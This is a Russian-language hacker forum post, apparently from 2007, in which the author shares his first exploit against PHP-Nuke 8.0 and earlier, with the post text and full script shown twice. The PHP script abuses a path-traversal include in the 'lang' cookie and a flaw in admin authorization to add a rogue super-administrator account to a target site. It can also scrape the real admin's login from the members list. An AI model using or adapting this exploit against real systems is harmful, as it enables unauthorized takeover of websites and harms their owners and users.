uNLike
12.04.2007, 11:31
Написал на днях тут эксплоит на nuke использовал уже известную уезвимость в куках, и также недочет в авторизации админа. Позволяее добавить своего админа. Вроде похожих сплоитов негде еше пока не видел. Строго не судите всеж первый сплоит мой:)
Поиск администратора писал в чисто учебно позновательных целей практика показала что быстрее вомного раз найти его ручками.
Сильно тож я его не потестил, на localhost точно работает:))
PS: И функции из какого-то сплоита взял я еше:)
<? //exploit for PHP-nuke <=8.0 Final
//Coded by: uNlike
//local include in cookie "lang"
Error_Reporting(E_ALL & ~E_NOTICE & ~E_WARNING);
$login=""; // user login (if you know super admin login not write)
$password=""; // user password (if you know super admin login not write)
$admin_login="admin"; // super admin login
$admin_file="admin"; // path to admin panel admin http://www.target.com/include/admin.php => "include/admin"
$host="http://www.target.com"; // target site
$cookie_file_path = "/tmp/cookie"; // for my opinuion, you can to set other
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
/////////////////
$cookie="";
if (!$admin_login)
{
echo "Login...<br>";
$url=$host."/modules.php?name=Your_Account";
$reffer=$host."/index.php";
$post['op']="login";
$post['username']=$login;
$post['user_password']=$password;
$result=query($url,$agent,$proxy,$reffer,$cookie_f ile_path,$post,"");
$cook=getcookiee($result);
foreach ($cook as $k=>$v) { $cookie[$k]=$v; }
if (strpos($result,'name="username" size="15" maxlength="25')) {echo "<b>Login or password is invalid</b>"; exit;}
echo "Find superadmin...<br>";
$url=$host."/modules.php?name=Members_List";
$cookie_base="";
foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; }
for($time=time()+2;$time>time();){echo ".";}
$result=query($url,$agent,$proxy,$reffer,$cookie_f ile_path,"",$cookie_base);
if (!strpos($result,'&op=logout&redirect=Forums')) {echo "<b>Super admin login was not found</b>"; exit; }
$start=strpos($result,'viewprofile&u=2');
$str=substr($result,$start+28,30);
$start=strpos($str,'>')+1;
$end=strpos($str,'<');
$len=$end-$start;
$admin_login=substr($str,$start,$len);
echo"Super admin login is <b>$admin_login</b>...<br>";
}
$cookie="";
echo "Exploiting...<br>";
$url=$host."/admin.php?aid=".$admin_login."&op=AddAuthor&add_aid=test&add_name=god&add_email=test@test.tt&add_pwd=test&add_radminsuper=1";
$reffer=$host;
$cookie_add="admin=1; lang=russian.php/../../admin/modules/authors;";
$result=query($url,$agent,"",$reffer,"/tmp/cook","",$cookie_add);
$url=$host."/".$admin_file.".php";
$reffer=$host."/".$admin_file.".php";
$post['op']="login";
$post['aid']="test";
$post['pwd']="test";
for($time=time()+2;$time>time();){echo ".";}
$result=query($url,$agent,$proxy,$reffer,"/tmp/cook",$post,$cookie_add);
if (!strpos($result,'_MODULESADMIN')) {echo "<b>Error exploiting</b>"; exit; }
echo "Super admin was creat:<br> Login: <b>test</b><br> Password: <b>test</b>";
function query($url,$agent,$proxy,$reffer,$cookie_file_path ,$post,$cookie) {
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if ($post!="") {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
curl_setopt ($ch, CURLOPT_TIMEOUT, 120);
curl_setopt ($ch, CURLOPT_PROXY, $proxy);
curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt ($ch, CURLOPT_FAILONERROR, false);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_HEADER, 1);
$result = curl_exec($ch);
$error=curl_errno($ch);
curl_close ($ch);
if ($error) $result="Fucking Error: ".$error."\r\n";
if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n";
if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n";
if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n";
return $result;
}
function getcookiee($result) {
$res = explode("\n",$result);
foreach ($res as $k=>$v ) {
if (ereg("Set-Cookie",$v)) {
$c_a = explode(";",trim(str_replace("Set-Cookie:","",$v)));
foreach ($c_a as $k=>$v ) {
if (!(ereg("expires",$v))) {
$arr=explode("=",trim($v));
$cook[trim($arr[0])]=trim($arr[1]);
}
}
}
}
return $cook;
}
?>
Поиск администратора писал в чисто учебно позновательных целей практика показала что быстрее вомного раз найти его ручками.
Сильно тож я его не потестил, на localhost точно работает:))
PS: И функции из какого-то сплоита взял я еше:)
<? //exploit for PHP-nuke <=8.0 Final
//Coded by: uNlike
//local include in cookie "lang"
Error_Reporting(E_ALL & ~E_NOTICE & ~E_WARNING);
$login=""; // user login (if you know super admin login not write)
$password=""; // user password (if you know super admin login not write)
$admin_login="admin"; // super admin login
$admin_file="admin"; // path to admin panel admin http://www.target.com/include/admin.php => "include/admin"
$host="http://www.target.com"; // target site
$cookie_file_path = "/tmp/cookie"; // for my opinuion, you can to set other
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
/////////////////
$cookie="";
if (!$admin_login)
{
echo "Login...<br>";
$url=$host."/modules.php?name=Your_Account";
$reffer=$host."/index.php";
$post['op']="login";
$post['username']=$login;
$post['user_password']=$password;
$result=query($url,$agent,$proxy,$reffer,$cookie_f ile_path,$post,"");
$cook=getcookiee($result);
foreach ($cook as $k=>$v) { $cookie[$k]=$v; }
if (strpos($result,'name="username" size="15" maxlength="25')) {echo "<b>Login or password is invalid</b>"; exit;}
echo "Find superadmin...<br>";
$url=$host."/modules.php?name=Members_List";
$cookie_base="";
foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; }
for($time=time()+2;$time>time();){echo ".";}
$result=query($url,$agent,$proxy,$reffer,$cookie_f ile_path,"",$cookie_base);
if (!strpos($result,'&op=logout&redirect=Forums')) {echo "<b>Super admin login was not found</b>"; exit; }
$start=strpos($result,'viewprofile&u=2');
$str=substr($result,$start+28,30);
$start=strpos($str,'>')+1;
$end=strpos($str,'<');
$len=$end-$start;
$admin_login=substr($str,$start,$len);
echo"Super admin login is <b>$admin_login</b>...<br>";
}
$cookie="";
echo "Exploiting...<br>";
$url=$host."/admin.php?aid=".$admin_login."&op=AddAuthor&add_aid=test&add_name=god&add_email=test@test.tt&add_pwd=test&add_radminsuper=1";
$reffer=$host;
$cookie_add="admin=1; lang=russian.php/../../admin/modules/authors;";
$result=query($url,$agent,"",$reffer,"/tmp/cook","",$cookie_add);
$url=$host."/".$admin_file.".php";
$reffer=$host."/".$admin_file.".php";
$post['op']="login";
$post['aid']="test";
$post['pwd']="test";
for($time=time()+2;$time>time();){echo ".";}
$result=query($url,$agent,$proxy,$reffer,"/tmp/cook",$post,$cookie_add);
if (!strpos($result,'_MODULESADMIN')) {echo "<b>Error exploiting</b>"; exit; }
echo "Super admin was creat:<br> Login: <b>test</b><br> Password: <b>test</b>";
function query($url,$agent,$proxy,$reffer,$cookie_file_path ,$post,$cookie) {
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if ($post!="") {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
curl_setopt ($ch, CURLOPT_TIMEOUT, 120);
curl_setopt ($ch, CURLOPT_PROXY, $proxy);
curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt ($ch, CURLOPT_FAILONERROR, false);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_REFERER, $reffer);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_HEADER, 1);
$result = curl_exec($ch);
$error=curl_errno($ch);
curl_close ($ch);
if ($error) $result="Fucking Error: ".$error."\r\n";
if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n";
if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n";
if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n";
return $result;
}
function getcookiee($result) {
$res = explode("\n",$result);
foreach ($res as $k=>$v ) {
if (ereg("Set-Cookie",$v)) {
$c_a = explode(";",trim(str_replace("Set-Cookie:","",$v)));
foreach ($c_a as $k=>$v ) {
if (!(ereg("expires",$v))) {
$arr=explode("=",trim($v));
$cook[trim($arr[0])]=trim($arr[1]);
}
}
}
}
return $cook;
}
?>